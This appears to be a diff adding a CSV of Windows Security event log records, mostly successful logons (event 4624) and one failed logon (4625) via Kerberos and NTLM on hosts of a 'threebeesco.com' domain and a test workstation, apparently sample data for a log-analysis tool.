+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:51.507713Z"">
+    </TimeCreated>
+    <EventRecordID>768620</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""640"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x31ff6e</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49707</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:32.174941Z"">
+    </TimeCreated>
+    <EventRecordID>768619</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x31fb1a</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50437</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:28:32.159991Z"">
+    </TimeCreated>
+    <EventRecordID>768618</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1636"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x31daf6</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50436</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:27.714758Z"">
+    </TimeCreated>
+    <EventRecordID>137225</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x1cd964</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x1cd8f6</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:27.714613Z"">
+    </TimeCreated>
+    <EventRecordID>137224</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x1cd8f6</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x1cd964</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:25.377120Z"">
+    </TimeCreated>
+    <EventRecordID>137223</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""712"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x25c</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4625</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8010000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:23.627952Z"">
+    </TimeCreated>
+    <EventRecordID>137222</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""Status"">0xc000006d</Data>
+    <Data Name=""FailureReason"">%%2313</Data>
+    <Data Name=""SubStatus"">0xc000006a</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:25.097874Z"">
+    </TimeCreated>
+    <EventRecordID>2988550</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""3868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x568d99</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64229</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:22.920903Z"">
+    </TimeCreated>
+    <EventRecordID>2988547</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""4528"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x56874b</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64227</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:22.906195Z"">
+    </TimeCreated>
+    <EventRecordID>2988544</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""4524"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x5686d9</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64226</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:20.521162Z"">
+    </TimeCreated>
+    <EventRecordID>2988535</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""2908"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-220106</Data>
+    <Data Name=""TargetUserName"">samir</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x567758</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:20.450493Z"">
+    </TimeCreated>
+    <EventRecordID>2988529</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""2908"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-220106</Data>
+    <Data Name=""TargetUserName"">samir</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x567515</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
